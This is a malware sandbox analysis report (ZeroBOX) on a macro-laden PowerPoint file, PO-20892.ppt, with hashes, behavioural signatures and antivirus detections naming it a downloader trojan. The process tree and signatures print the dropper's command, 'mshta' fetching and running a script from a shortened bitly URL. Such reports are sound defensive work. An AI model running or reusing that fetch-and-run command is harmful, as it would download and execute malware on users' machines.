Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6401	July 15, 2021, 9:22 a.m.	July 15, 2021, 9:24 a.m.

Size	58.5KB
Type	Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1252, Author: Master Mana, Last Saved By: Master Mana, Revision Number: 15, Name of Creating Application: Microsoft Office PowerPoint, Total Editing Time: 28:21, Create Time/Date: Tue Jul 13 02:06:37 2021, Last Saved Time/Date: Tue Jul 13 02:34:58 2021, Number of Words: 0
MD5	`d728d510f2b3020f9f5966787d11097d`
SHA256	`32397c143bd1d84c30ddda892b0f2e13f97ab22bfbc266738ffa7f369c97ea81`
CRC32	`B09A181C`
ssdeep	`192:sXBvavN1XE3fRj64pxxHHVDSmxpXcfykONSyIB+lwXcvTBFoP8u92+V:o8N1XE3fw4vx1DzxpXD0y+YmclFo39D`
Yara	Contains_VBA_macro_code - Detect a MS Office document with embedded VBA macro code [binaries] Microsoft_Office_File_Zero - Microsoft Office File

POWERPNT.EXE "C:\Program Files (x86)\Microsoft Office\Office12\POWERPNT.EXE" /S C:\Users\test22\AppData\Local\Temp\PO-20892.ppt
1116
- mshta.exe mshta https://bitly.com/ywuiqdbnasqwyudasbnd
  584

Name	Response	Post-Analysis Lookup
bitly.com	A 67.199.248.15 A 67.199.248.14	67.199.248.15

IP Address	Status	Action
164.124.101.2	Active	Moloch
67.199.248.15	Active	Moloch

Suricata Alerts

No Suricata Alerts

Suricata TLS

No Suricata TLS

Checks amount of memory in system, this can be used to detect virtual machines that have a low amount of memory available (1 event)

Time & API	Arguments	Status	Return	Repeated
GlobalMemoryStatusEx July 15, 2021, 9:22 a.m.		1	1	0

Allocates read-write-execute memory (usually to unpack itself) (7 events)

Time & API	Arguments	Status
NtProtectVirtualMemory July 15, 2021, 9:22 a.m.	process_identifier: 1116 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x6d2c1000 process_handle: 0xffffffff	1
NtProtectVirtualMemory July 15, 2021, 9:22 a.m.	process_identifier: 1116 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x65001000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 15, 2021, 9:22 a.m.	process_identifier: 1116 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05090000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 15, 2021, 9:22 a.m.	process_identifier: 1116 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05090000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 15, 2021, 9:22 a.m.	process_identifier: 1116 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x050a0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 15, 2021, 9:22 a.m.	process_identifier: 1116 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x050b0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory July 15, 2021, 9:22 a.m.	process_identifier: 584 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x6ea42000 process_handle: 0xffffffff	1

Creates a suspicious process (1 event)

cmdline

mshta https://bitly.com/ywuiqdbnasqwyudasbnd

Changes read-write memory protection to read-execute (probably to avoid detection when setting all RWX flags at the same time) (1 event)

Time & API	Arguments	Status	Return	Repeated
NtProtectVirtualMemory July 15, 2021, 9:22 a.m.	process_identifier: 584 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 32 (PAGE_EXECUTE_READ) base_address: 0x7ef80000 process_handle: 0xffffffff	1	0	0

Disables proxy possibly for traffic interception (1 event)

Time & API	Arguments	Status	Return	Repeated
RegSetValueExA July 15, 2021, 9:22 a.m.	key_handle: 0x000002bc regkey_r: ProxyEnable reg_type: 4 (REG_DWORD) value: 0 regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyEnable	1	0	0

One or more non-whitelisted processes were created (1 event)

parent_process

powerpnt.exe

martian_process

mshta https://bitly.com/ywuiqdbnasqwyudasbnd

File has been identified by 26 AntiVirus engines on VirusTotal as malicious (26 events)

Lionic	Trojan.Script.Generic.a!c
ALYac	Trojan.Downloader.VBA.gen
Cyren	Trojan.JXEI-7
Symantec	W97M.Downloader
ESET-NOD32	VBA/TrojanDownloader.Agent.WLA
TrendMicro-HouseCall	TROJ_FRS.VSNTGD21
Avast	Other:Malware-gen [Trj]
Cynet	Malicious (score: 99)
Kaspersky	HEUR:Trojan-Downloader.Script.Generic
BitDefender	VB:Trojan.VBA.Agent.BKX
MicroWorld-eScan	VB:Trojan.VBA.Agent.BKX
Rising	Downloader.Mshta/VBA!1.D6DF (CLASSIC)
Ad-Aware	VB:Trojan.VBA.Agent.BKX
Emsisoft	VB:Trojan.VBA.Agent.BKX (B)
F-Secure	Heuristic.HEUR/Macro.Downloader.MRKI.Gen
TrendMicro	TROJ_FRS.VSNTGD21
McAfee-GW-Edition	Artemis!Trojan
FireEye	VB:Trojan.VBA.Agent.BKX
Ikarus	Trojan-Downloader.VBA.Agent
GData	Generic.Trojan.Agent.UO8XW1
Avira	HEUR/Macro.Downloader.MRKI.Gen
Microsoft	Trojan:O97M/Obfuse.BPK!MTB
McAfee	RDN/Generic Downloader.x
MAX	malware (ai score=99)
Fortinet	VBA/Valyria.MRKI!tr
AVG	Other:Malware-gen [Trj]

PO-20892.ppt

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All